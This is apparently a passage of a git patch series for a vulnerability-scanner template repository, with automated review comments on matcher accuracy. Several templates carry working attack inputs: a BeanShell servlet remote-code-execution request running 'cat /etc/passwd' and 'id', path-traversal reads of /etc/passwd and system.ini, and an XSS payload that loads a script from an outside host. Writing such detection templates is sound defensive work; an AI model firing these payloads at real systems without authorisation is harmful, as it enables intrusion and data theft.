b/cnvd/CNVD-2021-10543.yaml similarity index 90% rename from exposures/configs/eea-disclosure.yaml rename to cnvd/CNVD-2021-10543.yaml index 459b5ea63a..a29fe66f5a 100644 --- a/exposures/configs/eea-disclosure.yaml +++ b/cnvd/CNVD-2021-10543.yaml 
@@ -1,11 +1,11 @@ -id: eea-disclosure +id: CNVD-2021-10543 info: name: EEA Information Disclosure author: pikpikcu severity: high reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543 - tags: config,exposure + tags: config,exposure,cnvd requests: - method: GET diff --git a/exposures/configs/ruijie-smartweb-disclosure.yaml b/cnvd/CNVD-2021-17369.yaml similarity index 90% rename from exposures/configs/ruijie-smartweb-disclosure.yaml rename to cnvd/CNVD-2021-17369.yaml index 47bf5c2ed1..8377c8296c 100644 --- a/exposures/configs/ruijie-smartweb-disclosure.yaml +++ b/cnvd/CNVD-2021-17369.yaml @@ -1,11 +1,11 @@ -id: ruijie-smartweb-disclosure +id: CNVD-2021-17369 info: name: Ruijie Smartweb Management System Password Information Disclosure author: pikpikcu severity: medium reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 - tags: ruijie,disclosure + tags: ruijie,disclosure,cnvd requests: - method: GET From 45a846baaebb648827a617f1ced000ee5391fe24 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 3 Jun 2021 16:27:57 +0000 Subject: [PATCH 115/144] Auto Update README [Thu Jun 3 16:27:57 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 7c7ad57715..ac78cecadc 100644 --- a/README.md +++ b/README.md 
@@ -38,10 +38,10 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 177 | exposed-panels | 145 | -| takeovers | 67 | exposures | 106 | technologies | 97 | +| cves | 325 | vulnerabilities | 173 | exposed-panels | 145 | +| takeovers | 67 | exposures | 104 | technologies | 97 | | misconfiguration | 67 | workflows | 31 | miscellaneous | 22 | -| default-logins | 30 | exposed-tokens | 0 | dns | 9 | +| default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | **110 directories, 1193 files**. From 3ee10413747149185a51bb60416d56784f87f932 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 22:47:18 +0530 Subject: [PATCH 116/144] misc changes --- .../CNVD-2021-30167.yaml | 19 +++++++++++++------ 1 file changed, 13 insertions(+), 6 deletions(-) rename vulnerabilities/other/nc-bsh-servlet-rce.yaml => cnvd/CNVD-2021-30167.yaml (66%) diff --git a/vulnerabilities/other/nc-bsh-servlet-rce.yaml b/cnvd/CNVD-2021-30167.yaml similarity index 66% rename from vulnerabilities/other/nc-bsh-servlet-rce.yaml rename to cnvd/CNVD-2021-30167.yaml index ba11421301..4302b87a88 100644 --- a/vulnerabilities/other/nc-bsh-servlet-rce.yaml +++ b/cnvd/CNVD-2021-30167.yaml @@ -1,11 +1,13 @@ -id: nc-bsh-servlet-rce +id: CNVD-2021-30167 info: - name: NC bsh.servlet.BshServlet RCE + name: UFIDA NC BeanShell Remote Code Execution author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - tags: beanshell,rce + reference: | + - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A + - https://www.cnvd.org.cn/webinfo/show/6491 + tags: beanshell,rce,cnvd requests: - raw: 
@@ -15,7 +17,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - bsh.script=exec("cat /etc/passwd"); + bsh.script=exec("id"); - | #windows POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 @@ -30,8 +32,13 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "uid=" - "Windows IP" + condition: or + + - type: word + words: + - "BeanShell Test Servlet" - type: status status: From e537467a5510e6bff00825852f2f3a5edfc2a7b0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 3 Jun 2021 17:20:14 +0000 Subject: [PATCH 117/144] Auto Update README [Thu Jun 3 17:20:14 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index ac78cecadc..9a7fa7f958 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1193 files**. +**110 directories, 1194 files**. From 0e3ed049ae1517d0f454ebbba30bfafa77282c97 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 23:00:47 +0530 Subject: [PATCH 118/144] misc changes --- cves/2020/CVE-2020-6308.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml index a9d1af9ed2..b29b3eee67 100644 --- a/cves/2020/CVE-2020-6308.yaml +++ b/cves/2020/CVE-2020-6308.yaml @@ -11,7 +11,6 @@ requests: - method: POST path: - '{{BaseURL}}/AdminTools/querybuilder/logon?framework=' - - '{{BaseURL}}:8080/AdminTools/querybuilder/logon?framework=' body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp From 8c1c7787afc0b50b9cfa2891126a6c8e404dd269 Mon Sep 17 00:00:00 2001 
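Review bot: The Linux execution proof in the regex matcher was loosened from `root:[x*]:0:0` to a bare `uid=`, which can appear in ordinary page content, echoed query strings or JSON, so the `and` with `BeanShell Test Servlet` is now the only thing separating a real hit from a page that merely reflects input. Anchoring it to the shape `id` actually prints, e.g. `- "uid=[0-9]+\\([^)]+\\)"`, keeps the `condition: or` with `Windows IP` meaningful. A comment above `condition: or` saying that the first alternative is the Linux `id` output and the second presumably the Windows `ipconfig` banner would help, since the Windows request body is outside this hunk. The raw `requests` block both payloads belong to starts above the hunk.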
From: GitHub Action Date: Thu, 3 Jun 2021 21:10:16 +0000 Subject: [PATCH 119/144] Auto Update README [Thu Jun 3 21:10:16 UTC 2021] :robot: --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 9a7fa7f958..898bef1067 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 173 | exposed-panels | 145 | -| takeovers | 67 | exposures | 104 | technologies | 97 | -| misconfiguration | 67 | workflows | 31 | miscellaneous | 22 | -| default-logins | 29 | exposed-tokens | 0 | dns | 9 | +| cves | 327 | vulnerabilities | 173 | exposed-panels | 145 | +| takeovers | 67 | exposures | 104 | technologies | 98 | +| misconfiguration | 65 | workflows | 32 | miscellaneous | 22 | +| default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1194 files**. +**111 directories, 1199 files**. From bc9a760d293ac56e7cc2c1f62a94893ed5ac38b0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 4 Jun 2021 02:54:55 +0000 Subject: [PATCH 120/144] Create interlib-fileread.yaml --- vulnerabilities/other/interlib-fileread.yaml | 27 ++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/other/interlib-fileread.yaml diff --git a/vulnerabilities/other/interlib-fileread.yaml b/vulnerabilities/other/interlib-fileread.yaml new file mode 100644 index 0000000000..32be6e4dbb --- /dev/null +++ b/vulnerabilities/other/interlib-fileread.yaml 
@@ -0,0 +1,27 @@ +id: interlib-fileread + +info: + name: Interlib Fileread + author: pikpikcu + severity: high + reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + tags: interlib,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd" + - "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\Windows\system.ini" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + - "for 16-bit" + condition: and + + - type: status + status: + - 200 From c5b445e1ecff093f4190132eb1a4b69ad9dce7d5 Mon Sep 17 00:00:00 2001 From: savik Date: Fri, 4 Jun 2021 10:17:20 +0300 Subject: [PATCH 121/144] Update ruijie-workflow.yaml --- workflows/ruijie-workflow.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/workflows/ruijie-workflow.yaml b/workflows/ruijie-workflow.yaml index 5ba69854c5..086cd7d125 100644 --- a/workflows/ruijie-workflow.yaml +++ b/workflows/ruijie-workflow.yaml @@ -6,9 +6,9 @@ info: description: A simple workflow that runs all Ruijie related nuclei templates on a given target. workflows: - - template: default-logins/smartweb/ruijie-smartweb-default-password.yaml + - template: cnvd/CNVD-2021-17369.yaml - template: vulnerabilities/other/ruijie-networks-lfi.yaml - template: vulnerabilities/other/ruijie-networks-rce.yaml - template: exposures/configs/ruijie-information-disclosure.yaml - - template: exposures/configs/ruijie-smartweb-disclosure.yaml + - template: cnvd/CNVD-2020-56167.yaml - template: exposures/configs/ruijie-phpinfo.yaml From 2171f7ec21f1fb87be3ed9ed62489d96d3e87671 Mon Sep 17 00:00:00 2001 
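Review bot: The two replaced workflow paths are crossed relative to the renames earlier in this series: `default-logins/smartweb/ruijie-smartweb-default-password.yaml` became `cnvd/CNVD-2020-56167.yaml` and `exposures/configs/ruijie-smartweb-disclosure.yaml` became `cnvd/CNVD-2021-17369.yaml`, yet here the default-password line is replaced by `cnvd/CNVD-2021-17369.yaml` and the disclosure line by `cnvd/CNVD-2020-56167.yaml`. The workflow still runs both templates, so nothing breaks, but the diff reads as if each template changed identity. Swapping the two `- template:` lines so each replacement sits where its original did (`- template: cnvd/CNVD-2020-56167.yaml` first, `- template: cnvd/CNVD-2021-17369.yaml` fifth) keeps the rename history traceable.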
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 4 Jun 2021 18:28:45 +0900 Subject: [PATCH 122/144] Create CVE-2021-24316.yaml --- CVE-2021-24316.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 CVE-2021-24316.yaml diff --git a/CVE-2021-24316.yaml b/CVE-2021-24316.yaml new file mode 100644 index 0000000000..9523dbbcab --- /dev/null +++ b/CVE-2021-24316.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-24316 + +info: + author: 0x_Akoko + description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS. + name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress + severity: medium + tags: Mediumish,xss,wordpress + reference: | + - https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-24316 + +requests: + - method: GET + path: + ## you can edit this js file with your custom js. //m0ze.ru/payload/a2r.js decode it (base64) with your own. + - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header From 8e13733d343978d0320de5f751f8a355895b149d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 16:30:31 +0530 Subject: [PATCH 123/144] moving files around --- .../2021/CVE-2021-24316.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) rename CVE-2021-24316.yaml => cves/2021/CVE-2021-24316.yaml (53%) diff --git a/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml similarity index 53% rename from CVE-2021-24316.yaml rename to cves/2021/CVE-2021-24316.yaml index 9523dbbcab..00b724d223 100644 --- a/CVE-2021-24316.yaml +++ b/cves/2021/CVE-2021-24316.yaml 
@@ -5,16 +5,16 @@ info: description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS. name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress severity: medium - tags: Mediumish,xss,wordpress + tags: cve,cve2021,mediumish,xss,wordpress reference: | - - https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-24316 + - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e + - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt requests: - method: GET path: - ## you can edit this js file with your custom js. //m0ze.ru/payload/a2r.js decode it (base64) with your own. - - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E' - + - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E ' + matchers-condition: and matchers: - type: status @@ -23,8 +23,10 @@ requests: - type: word words: - - "" + - "" + - "Sorry, no posts matched your criteria." part: body + condition: and - type: word words: From b138c11548b4463269e6a7b19a9cd14ed271cef9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 16:32:49 +0530 Subject: [PATCH 124/144] wordpress workflow update --- workflows/wordpress-workflow.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index d94b0ef9da..09d2866f30 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -32,4 +32,5 @@ workflows: - template: cves/2020/CVE-2020-35489.yaml - template: cves/2021/CVE-2021-24146.yaml - template: cves/2021/CVE-2021-24176.yaml + - template: cves/2021/CVE-2021-24316.yaml - template: vulnerabilities/wordpress/ \ No newline at end of file From aaa00868682fa3fa457628779af4557abaadd538 Mon Sep 17 00:00:00 2001 
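Review bot: The rewritten `path` entry ends with a space inside the single quotes (`%3C/script%3E '`), so the request target is sent with a trailing space — an invalid request-target for strict servers and at best a different `s=` value than intended, which can make the `Sorry, no posts matched your criteria.` match miss. Drop it: `- '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E'`. In the second hunk the first body word renders as an empty `- ""` here; if that is an extraction artefact it should hold the reflected `<script>alert(/{{randstr}}/)</script>` string, otherwise the `condition: and` is satisfied by any 200 page that carries the no-posts text.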
From: GitHub Action Date: Fri, 4 Jun 2021 11:03:26 +0000 Subject: [PATCH 125/144] Auto Update README [Fri Jun 4 11:03:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 898bef1067..a5d258488f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 327 | vulnerabilities | 173 | exposed-panels | 145 | +| cves | 328 | vulnerabilities | 173 | exposed-panels | 145 | | takeovers | 67 | exposures | 104 | technologies | 98 | | misconfiguration | 65 | workflows | 32 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**111 directories, 1199 files**. +**111 directories, 1200 files**. From b6396aa3109db5513409ba1c51b46f2a6ce3ea10 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 18:50:38 +0530 Subject: [PATCH 126/144] Added zend-config-file --- exposures/configs/zend-config-file.yaml | 27 +++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposures/configs/zend-config-file.yaml diff --git a/exposures/configs/zend-config-file.yaml b/exposures/configs/zend-config-file.yaml new file mode 100644 index 0000000000..8c3039bfeb --- /dev/null +++ b/exposures/configs/zend-config-file.yaml 
@@ -0,0 +1,27 @@ +id: zend-config-file + +info: + name: Zend Configuration File + author: pdteam + severity: high + tags: config,exposure,zend,php + +requests: + - method: GET + path: + - "{{BaseURL}}/application/configs/application.ini" + + matchers-condition: and + matchers: + - type: word + words: + - "resources.db.params.password" + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 From f6fb88c5371813bf9465a8389cbc1cd97bdaf089 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Jun 2021 14:11:23 +0000 Subject: [PATCH 127/144] Auto Update README [Fri Jun 4 14:11:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a5d258488f..444656f365 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 328 | vulnerabilities | 173 | exposed-panels | 145 | -| takeovers | 67 | exposures | 104 | technologies | 98 | +| takeovers | 67 | exposures | 105 | technologies | 98 | | misconfiguration | 65 | workflows | 32 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**111 directories, 1200 files**. +**111 directories, 1201 files**. From e2555d69d1c58fc13e90749261a44c38bf99f23a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 19:59:41 +0530 Subject: [PATCH 128/144] minor improvements --- exposures/configs/exposed-bzr.yaml | 7 ++++++- exposures/configs/exposed-svn.yaml | 12 ++++++------ 2 files changed, 12 insertions(+), 7 deletions(-) 
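Review bot: The `text/plain` header matcher will drop true positives on servers that do not map `.ini` to that type; nginx's stock `mime.types`, as shipped, maps only `.txt` to `text/plain` and falls back to `application/octet-stream`, so an exposed `application.ini` there never matches even though `resources.db.params.password` is in the body. Since the body word is already specific, either drop the header matcher or turn it into a negative HTML check — `words: - "<html"` with `part: body` and `negative: true` — so a soft-404 page is still excluded. A one-line `description:` in `info` (what the file is and that it carries DB credentials) would also justify `severity: high`, which is otherwise unexplained.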
diff --git a/exposures/configs/exposed-bzr.yaml b/exposures/configs/exposed-bzr.yaml index 5f00619d9e..c90b3457cd 100644 --- a/exposures/configs/exposed-bzr.yaml +++ b/exposures/configs/exposed-bzr.yaml @@ -18,8 +18,13 @@ requests: words: - "parent_location" - "push_location" - condition: and + condition: or - type: status status: - 200 + + - type: word + part: header + words: + - "text/plain" \ No newline at end of file diff --git a/exposures/configs/exposed-svn.yaml b/exposures/configs/exposed-svn.yaml index b88ce042e1..7be0564837 100644 --- a/exposures/configs/exposed-svn.yaml +++ b/exposures/configs/exposed-svn.yaml @@ -4,14 +4,12 @@ info: name: Exposed SVN Directory author: udit_thakkur & dwisiswant0 severity: medium - tags: config,exposure + tags: config,exposure,svn requests: - method: GET path: - "{{BaseURL}}/.svn/entries" - - "{{BaseURL}}/.svn/prop-base/" - - "{{BaseURL}}/.svn/text-base/" matchers-condition: and matchers: @@ -19,10 +17,12 @@ requests: part: body regex: - "(^10\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))" + - type: status status: - 200 - - type: dsl - dsl: - - 'contains(tolower(body), "") == false' \ No newline at end of file + - type: word + part: header + words: + - "text/plain" \ No newline at end of file From 5efa716b73bf402a80d3fa8ccfd7e28c56d67ffa Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 20:24:08 +0530 Subject: [PATCH 129/144] Added epson-wf-series --- iot/epson-wf-series.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 iot/epson-wf-series.yaml diff --git a/iot/epson-wf-series.yaml b/iot/epson-wf-series.yaml new file mode 100644 index 0000000000..7dbf211998 --- /dev/null +++ b/iot/epson-wf-series.yaml 
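Review bot: Replacing the dsl body check with a `text/plain` header matcher on `.svn/entries` trades a false-positive guard for a false-negative one: `entries` has no extension, so a server that serves unknown files as `application/octet-stream` (nginx's default) or with no `Content-Type` at all will never match even when the body regex hits. A negative body word — `- type: word`, `part: body`, `words: - "<html"`, `negative: true` — keeps soft-404 HTML out without depending on the server's MIME table. The same caveat applies to the `text/plain` matcher added to `exposed-bzr.yaml` in this commit.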
@@ -0,0 +1,23 @@ +id: epson-wf-series + +info: + name: Epson WF Series Detection + author: aashiq + severity: info + description: Searches for Epson WF series printers on the domain + tags: iot,printer + +requests: + - method: GET + path: + - "{{BaseURL}}/PRESENTATION/HTML/TOP/PRTINFO.HTML" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "SEIKO EPSON" \ No newline at end of file From f2e5578ae5a2b8b6ab10f38519834ded573d8677 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 20:29:36 +0530 Subject: [PATCH 130/144] Added LuCi Login Detector --- exposed-panels/luci-login-detection.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/luci-login-detection.yaml diff --git a/exposed-panels/luci-login-detection.yaml b/exposed-panels/luci-login-detection.yaml new file mode 100644 index 0000000000..0824c5021a --- /dev/null +++ b/exposed-panels/luci-login-detection.yaml @@ -0,0 +1,23 @@ +id: luci-login-detection + +info: + name: LuCi Login Detector + author: aashiq + severity: info + description: Searches for LuCi Login pages by attempting to query the cgi-bin endpoint + tags: login + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/luci" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Authorization Required" From 76bd8824a5cbe5c5b39ce213a85afca281129f3d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 20:36:33 +0530 Subject: [PATCH 131/144] Added WordPress Mailchimp 4 Debug Log Exposure --- .../wordpress/wp-mailchimp-log-exposure.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml 
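Review bot: `Authorization Required` is the body text of a generic HTTP 401 page, so with `status: 200` the matcher relies on LuCI rendering that phrase inside a 200 login page; anything else under `/cgi-bin/luci` that returns the same wording with a 200 also matches. Requiring the product name too — `words: - "Authorization Required" - "LuCI"` with `condition: and` — would narrow it, assuming the login page carries its own branding (worth confirming against a real device). `tags: login` could also carry `panel,openwrt` so the template is picked up by the usual panel workflows, and `LuCi` in `name` should be spelled `LuCI`.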
diff --git a/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml b/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml new file mode 100644 index 0000000000..1869a7386f --- /dev/null +++ b/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml @@ -0,0 +1,28 @@ +id: wp-mailchimp-log-exposure + +info: + name: WordPress Mailchimp 4 Debug Log Exposure + author: aashiq + severity: medium + description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content + tags: logs,wordpress,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "WARNING: Form" + + - type: word + words: + - 'text/plain' + part: header \ No newline at end of file From edcc35d604c95f589a014fe63b55c038d8021160 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 20:46:19 +0530 Subject: [PATCH 132/144] Added Private key exposure via helper detector --- misconfiguration/private-key-exposure.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 misconfiguration/private-key-exposure.yaml diff --git a/misconfiguration/private-key-exposure.yaml b/misconfiguration/private-key-exposure.yaml new file mode 100644 index 0000000000..c478f731a0 --- /dev/null +++ b/misconfiguration/private-key-exposure.yaml 
@@ -0,0 +1,25 @@ +id: private-key-exposure + +info: + name: Private key exposure via helper detector + author: aashiq + severity: high + description: Searches for private key exposure by attempting to query the helper endpoint on node_modules + tags: exposure,node + +requests: + - method: GET + path: + - "{{BaseURL}}/node_modules/mqtt/test/helpers/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Index of /node_modules/mqtt/test/helpers" + - "Parent Directory" + condition: and \ No newline at end of file From 1557b782e952f720b0c6731a339ac0977a434148 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 20:57:01 +0530 Subject: [PATCH 133/144] Added WordPress Popup Plugin listing --- .../wordpress/wp-popup-listing.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-popup-listing.yaml diff --git a/vulnerabilities/wordpress/wp-popup-listing.yaml b/vulnerabilities/wordpress/wp-popup-listing.yaml new file mode 100644 index 0000000000..e8ea453ee8 --- /dev/null +++ b/vulnerabilities/wordpress/wp-popup-listing.yaml @@ -0,0 +1,25 @@ +id: wordpress-popup-listing + +info: + name: WordPress Popup Plugin Directory Listing + author: aashiq + severity: info + description: Searches for sensitive directories present in the wordpress-popup plugin. + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Index of" + - "/wp-content/plugins/wordpress-popup/views/admin" + condition: and From 9d8634be337f19d48542de8586d7a5de601182dd Mon Sep 17 00:00:00 2001 
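Review bot: The matcher proves only that `/node_modules/mqtt/test/helpers/` has directory listing enabled, not that a private key is readable, yet `name`, `description` and `severity: high` all claim key exposure. If the helper directory ships a fixed key file (the listing would name it), request that file directly and match `-----BEGIN` together with `PRIVATE KEY-----` in the body — a stronger proof that also works without autoindex; otherwise lower the severity and describe the finding as a `node_modules` listing. `Parent Directory` is Apache's autoindex wording, so nginx autoindex pages (which print `../`) would fail the `condition: and`; `Index of /node_modules/mqtt/test/helpers` is the discriminating word and suffices on its own.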
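Review bot: The template `id: wordpress-popup-listing` does not match the filename `wp-popup-listing.yaml`, while every other template added in this series (`wp-mailchimp-log-exposure`, `zend-config-file`, `epson-wf-series`) keeps id and filename identical; nuclei reports by id, so the mismatch makes a finding hard to trace back to its file. Rename to `id: wp-popup-listing`. The `description` speaks of "sensitive directories" but the request covers only `views/admin/`; either say so or add the other paths considered sensitive.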
From: GitHub Action Date: Fri, 4 Jun 2021 15:29:59 +0000 Subject: [PATCH 134/144] Auto Update README [Fri Jun 4 15:29:58 UTC 2021] :robot: --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 444656f365..d8cdc59cb8 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 328 | vulnerabilities | 173 | exposed-panels | 145 | +| cves | 328 | vulnerabilities | 175 | exposed-panels | 146 | | takeovers | 67 | exposures | 105 | technologies | 98 | -| misconfiguration | 65 | workflows | 32 | miscellaneous | 22 | +| misconfiguration | 66 | workflows | 32 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | -| fuzzing | 9 | helpers | 8 | iot | 12 | +| fuzzing | 9 | helpers | 8 | iot | 13 | -**111 directories, 1201 files**. +**111 directories, 1206 files**. From 1fab4f8dbfb2dc2b5e9f3fbaac901454dcffdfdf Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 21:14:20 +0530 Subject: [PATCH 135/144] Duplicate with - wordpress-directory-listing --- .../wordpress/wp-uploads-listing.yaml | 32 ------------------- 1 file changed, 32 deletions(-) delete mode 100644 vulnerabilities/wordpress/wp-uploads-listing.yaml diff --git a/vulnerabilities/wordpress/wp-uploads-listing.yaml b/vulnerabilities/wordpress/wp-uploads-listing.yaml deleted file mode 100644 index 86af016597..0000000000 --- a/vulnerabilities/wordpress/wp-uploads-listing.yaml +++ /dev/null 
